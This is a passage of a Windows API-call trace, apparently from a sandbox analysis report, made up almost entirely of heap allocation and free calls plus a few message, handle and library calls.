lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0196.615] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0196.615] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0196.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0196.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0196.616] FreeLibrary (hLibModule=0x74d40000) returned 1 [0196.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0196.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.616] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0196.616] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0196.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.616] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0196.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0196.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0196.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0196.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0196.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0196.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0196.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0196.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0196.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0196.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0196.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0196.618] CloseHandle (hObject=0x294) returned 1 [0196.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0196.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0196.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0196.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0196.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0196.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.620] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0196.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0196.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0196.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0196.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0196.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0196.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0196.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0196.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0196.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.621] CloseHandle (hObject=0x268) returned 1 [0196.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0196.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0196.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0196.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0196.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.636] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0196.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0196.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0196.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0196.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0196.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0196.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0196.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0196.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0196.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0196.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0196.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0196.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0196.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0196.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0196.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0196.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0196.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0196.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0196.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0196.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0196.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0196.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0196.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0196.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0196.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0196.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0196.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0196.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0196.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0196.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0196.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0196.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0196.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0196.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0196.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0196.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0196.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0196.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0196.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0196.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0196.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0196.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f7260 | out: hHeap=0x25c0000) returned 1 [0196.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0196.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0196.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0196.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0196.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0196.644] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0196.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0196.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0196.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0196.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0196.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0196.644] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0196.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0196.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0196.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0196.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0196.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0196.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e70 [0196.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) 